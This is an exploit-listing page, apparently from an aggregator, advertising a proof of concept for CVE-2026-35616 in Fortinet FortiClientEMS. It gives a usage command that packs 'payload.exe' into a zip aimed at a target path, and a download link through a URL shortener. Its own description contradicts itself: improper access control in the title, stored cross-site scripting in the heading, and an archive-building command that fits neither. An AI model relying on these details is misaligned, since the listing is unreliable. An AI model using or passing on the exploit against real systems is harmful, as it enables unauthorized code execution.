Exploit for Improper Access Control in Fortinet Forticlientems CVE-2026-35616

Name: Exploit for Improper Access Control in Fortinet Forticlientems CVE-2026-35616
Rating: 5 (3 reviews)

2026-06-09 | CVSS 9.8

## https://sploitus.com/exploit?id=30FD75A4-3B03-5D66-9393-C2EC954792B5
# CVE-2026-35616 - Fortinet FortiClientEMS 7.4.5 Unauthenticated Stored Cross-Site Scripting

## Quick Usage

```bash
python3 exploit.py -t "C:\\Path\\To\\Target" -o demo.zip --data-file payload.exe
```

## Exploitation Notes

- **Severity:** CRITICAL
- **CVSS:** 9.8
- **Impact:** Confidentiality, Integrity, Availability
- **Published:** 2026-04-04

## Technical Summary

A improper access control vulnerability in Fortinet FortiClientEMS 7.4.5 through 7.4.6 may allow an unauthenticated attacker to execute unauthorized code or commands via crafted requests.

## Affected Versions

**Fortinet Forticlientems:**

- 7.4.5
- 7.4.6

## References

- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-35616

## Exploit

[Download PoC](https://tinyurl.com/255fbm7z)